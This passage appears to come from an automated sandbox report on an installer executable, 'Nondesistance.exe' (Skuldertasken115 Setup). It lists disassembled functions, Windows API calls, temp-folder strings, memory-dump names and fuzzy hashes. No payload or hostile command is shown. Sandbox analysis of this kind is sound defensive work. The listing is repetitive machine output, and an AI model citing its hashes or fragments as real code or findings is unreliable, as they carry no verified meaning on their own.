                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                  • String ID: %u.%u%s%s$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 3540041739-1308450828
                                                                                                  • Opcode ID: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
                                                                                                  • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                  • Opcode Fuzzy Hash: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
                                                                                                  • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                  Function 00403974 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetWindowTextA.USER32(00000000,Skuldertasken115 Setup), ref: 00403A0C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: TextWindow
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$1033$Skuldertasken115 Setup$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 530164218-1759130687
                                                                                                  • Opcode ID: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                  • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                  • Opcode Fuzzy Hash: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                  • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                  Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849352358-0
                                                                                                  • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                  • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                  • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                  • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                  Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDC.USER32(?), ref: 00401D3B
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                  • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3808545654-0
                                                                                                  • Opcode ID: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
                                                                                                  • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                                  • Opcode Fuzzy Hash: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
                                                                                                  • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                                  Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                  • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 2659869361-787714339
                                                                                                  • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                  • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                                  • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                  • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                                  Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(00000000,00000000,00402DE2,?), ref: 00402C15
                                                                                                  • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 2102729457-0
                                                                                                  • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                  • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                                                  • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                                                  • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                                                  Function 0040588F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Skuldertasken115 Setup,NSIS Error), ref: 00405D3C
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                  • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                  • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 3248276644-787714339
                                                                                                  • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                  • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                                  • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                  • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                                  Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                                    • Part of subcall function 00403F60: SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 00403F72
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                  • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                  • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                                  • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                  • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                                  Function 0040361A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?,77323410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                                  • GlobalFree.KERNEL32(00629790), ref: 0040363B
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 1100898210-787714339
                                                                                                  • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                  • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                                  • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                  • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                                  Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nondesistance.exe,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004057EE
                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nondesistance.exe,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004057FC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrlen
                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                  • API String ID: 2709904686-3443045126
                                                                                                  • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                  • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                                                  • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                  • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                                  Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                  • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                  • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                  • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                  Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
